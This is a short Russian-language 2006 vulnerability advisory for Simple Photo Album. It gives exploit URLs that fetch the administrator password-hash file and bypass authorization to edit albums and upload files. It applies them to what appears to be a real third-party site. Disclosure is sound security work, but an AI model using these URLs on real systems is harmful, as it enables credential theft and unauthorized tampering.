Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[ECHO_ADV_58$2006]Cyb erfolio <=2.0 RC1 $av  Remote File Inclusion Vulnerability

[ECHO_ADV_57$2006]Soh olaunch Pro <=4.9 r36 Multiple Remote File Inclusion Vulnerability

PHPAdventure 1.1 (ad_main. php) Remote File Include Vulnerability

iWare Pro <= 5.0.4 (chat_panel. php) Remote Code Execution Vulnerability

From:	durito <durito_(at)_mail.ru>
Date:	08.11.2006
Subject:	уязвимости Simple Photo Album - 1.2 и 2.5

 Software:   Simple Photo Album - 1.2 и 2.5
 Vendor:  www.gieson.com
 Vulnerability: получение удаленным пользователем файла с хешем администратора Simple Photo Album в 1.2 и 2.5, возможность редактирования фотоальбома в обход авторизации, загрузка произвольных файлов - версия 1.2.
 Risk:  высокий
 Date:  7.11.2006
 discovered by durito [damagelab] -durito[at]mail[dot]ru-
 HTTP:       durito.narod.ru
             www.damagelab.org
               

+~~~:| Details |:

Получение удаленным пользователем файла с хешем администратора Simple Photo Album в 1.2 и 2.5.

+~~~:| Экплойт |:

http://target.com/Simple Photo Album/albums/pwd.txt

+~~~:| Details 2 |:

Возможность редактирования фотоальбома в обход авторизации, загрузка произвольных файлов - только версия 1.2

+~~~:| Экплойт |:

http://target.com/Simple Photo Album/index.php?action=editAlbum&displayAlbumName=[имя_фотоальбома]

++++++++++++++++++++++++++

пример:
http://www.keebonk.ch/pix/albums/pwd.txt
http://www.keebonk.ch/pix/index.php?action=editAlbum&displayAlbumName=set9